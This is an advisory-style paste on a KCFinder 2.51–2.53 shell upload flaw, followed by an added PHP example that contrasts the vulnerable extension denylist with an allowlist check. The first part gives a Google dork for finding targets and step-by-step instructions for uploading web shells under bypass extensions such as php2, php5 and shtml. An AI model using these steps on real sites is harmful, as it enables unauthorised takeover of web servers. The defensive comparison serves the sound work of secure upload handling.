Kyfx

KcFinder 2.53 Shell Upload Vulnerability

May 15th, 2015
Exploit Title : KCFinder Upload Shell Vulnerability
Date : 24/04/2014
Google Dork : inurl:/kcfinder/browse.php
Exploit Author : Lordbonsky
Home : http://www.idc-team.net
Discovered By : B0nsky404
Vendor Homepage : http://kcfinder.sunhater.com/
Version : 2.51 – 2.53
Tested on : Windows 8 & Linux

Events location bug:
http://[localhost]/[path]/kcfinder/config.php
Line 51: 'deniedExts' => "exe com msi bat php phps phtml php3 php4 cgi pl",

Exploit:
http://[localhost]/kcfinder/browse.php
http://[localhost]/[path]/kcfinder/browse.php

Proof:
STEP 1: Go to target link http://localhost/KCFinder/browse.php
STEP 2: Then select your folder from the left panel
STEP 3: Upload your shell as [ shell.php2 & shell.php5 & shell.php.black & shell.shtml & defpage.html ]
STEP 4: Shell execution path http://[localhost]/[path]/files/shell.php2 OR http://[localhost]/[path]/files/files/shell.php2
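The 'deniedExts' line quoted above is a denylist, and none of the file names in step 3 end in an extension it contains. The following added example (not code from this paste or from KCFinder) compares that denylist with an allowlist check over those names; the function names, the allowlist contents and the assumption that the denylist is matched against the final extension only are all hypothetical.

```php
<?php
// Added example: not KCFinder's code. Function names and the allowlist are assumptions.

// Denylist string exactly as quoted from config.php line 51 in the advisory.
const DENIED_EXTS = "exe com msi bat php phps phtml php3 php4 cgi pl";

// Assumed allowlist for an image/document upload area; adjust to the site's needs.
const ALLOWED_EXTS = ["jpg", "jpeg", "png", "gif", "pdf"];

// Denylist check (assumed behaviour): reject only if the final extension is listed.
function denylist_accepts(string $name): bool
{
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return !in_array($ext, explode(" ", DENIED_EXTS), true);
}

// Allowlist check: exactly one extension, and it must be on the allowlist.
// Rejecting multi-dot names is deliberately strict: it also refuses names such
// as "my.report.pdf", in exchange for refusing "shell.php.black"-style names
// that some server configurations map to a handler by an inner extension.
function allowlist_accepts(string $name): bool
{
    $parts = explode(".", basename($name));
    if (count($parts) !== 2 || $parts[0] === "") {
        return false;
    }
    return in_array(strtolower($parts[1]), ALLOWED_EXTS, true);
}

// File names from the advisory's step 3, plus one constructed benign upload.
$samples = ["shell.php2", "shell.php5", "shell.php.black", "shell.shtml",
            "defpage.html", "photo.JPG"];

foreach ($samples as $name) {
    printf("%-16s denylist=%-6s allowlist=%s\n", $name,
        denylist_accepts($name) ? "accept" : "reject",
        allowlist_accepts($name) ? "accept" : "reject");
}
```

The denylist accepts every sample, while the allowlist accepts only photo.JPG. Extension filtering is one layer; the upload directory should also be served with script and SSI handlers disabled.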